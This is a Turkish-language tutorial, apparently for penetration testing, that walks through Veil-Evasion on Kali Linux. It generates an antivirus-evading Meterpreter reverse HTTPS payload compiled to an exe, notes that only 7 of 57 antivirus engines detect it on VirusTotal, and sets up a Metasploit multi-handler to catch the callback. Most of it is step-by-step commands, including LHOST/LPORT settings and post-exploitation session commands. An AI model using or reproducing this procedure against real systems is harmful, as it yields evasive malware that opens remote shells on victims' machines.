Veil-Evasion kurulu bir Kali bilgisayarda Veil-Evasion kurulum dizini (/root/Veil/Veil-Evasion/ gibi) içerisindeki python betiği çalıştırılarak zararlı yazılım oluşturulabilir.
ls
./Veil-Evasion.py
Betik çalıştırıldıktan sonra, tüm payload çeşitleri listelenebilir.
list
Şubat 2015 itibari ile yayında olan Veil-Evasion veritabanında 39 adet payload bulunduğu görülmektedir.
Veil-Evasion komut satırında “info” komutundan sonra payload adı veya payload ID değeri girilerek payload hakkında ayrıntılı bilgi edinilebilir.
info 24
info python/meterpreter/rev_https
Veil-Evasion komut satırında direk olarak payload ID değeri girilerek, “use” komutundan sonra payload adı veya payload ID değeri girilerek kullanılmak istenen payload seçilebilir.
24
use 24
use python/meterpreter/rev_https
Seçilen payload parametreleri ayarlanarak, payload oluşturulmasına başlanabilir.
set LHOST 192.168.244.146
set LPORT 443
generate
Veil-Evasion ile oluşturulan dosyaya isim verilir ve python ile oluşturulan zararlı yazılım exe dosyasına çevirilir. Bu adım payload tipine göre değişiklik gösterebilir.
Böylece otomatik olarak uygulama oluşur.
Oluşan exe dosyası /usr/share/veil-evasion/compiled dizinine kayıt edilmiştir.
Bu dizinde dosyanın olduğu görülmektedir.
Ayrıca “/usr/share/veil-evasion/handlers” dizinine bir kaynak dosyası (resource file) kayıt edilmiştir.
Bu dosyanın içeriğinde MSF multi-handler istismar modülüne ait seçeneklerin bulunduğu görülmektedir.
Hazırlanan zararlı uygulama VirusTotal ile taratıldığında 57 antivirüsten 7 tanesi tarafından tespit edilebileceği görülmektedir.
İpucu: Çok etkin bir sonuc vermese de “/usr/share/veil-evasion” dizini altındaki “hashes.txt” dosyası içerisinde oluşan dosyanın özet değeri bulunmaktadır. Bu değer VirusTotal’e verilerek veya Veil-Evasion komut satırındaki “checkvt” komutuna verilerek antivirüsler tarafından daha önceden tespit edilip edilmediği incelenebilir.
checkvt 7cdf8a5b3be020d56a248c56809a3db055129ea3
Hazırlanan zararlı uygulama çalıştırıldığında, bir talep oluşacaktır. Bu talebin yakalanması için bir MSF multi-handler oluşturulur ve beklenir.
use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.244.146
set LPORT 443
set ExitOnSession false
exploit -j -z
Zararlı yazılım Windows bir işletim sistemi çalıştırıldığında, Meterpreter bağlantı talebinin MSF multi-handler istismar modülü tarafından yakalandığı görülmektedir.
Hazırlanan payload ile kullanıcı hakları ile yeni bir proses (Veil-Evasion ile hazırlanan hazırlanan uygulama ile aynı isimde) oluştuğu görülmektedir.
sessions -i 1
getuid
getpid
ps -U Yonetici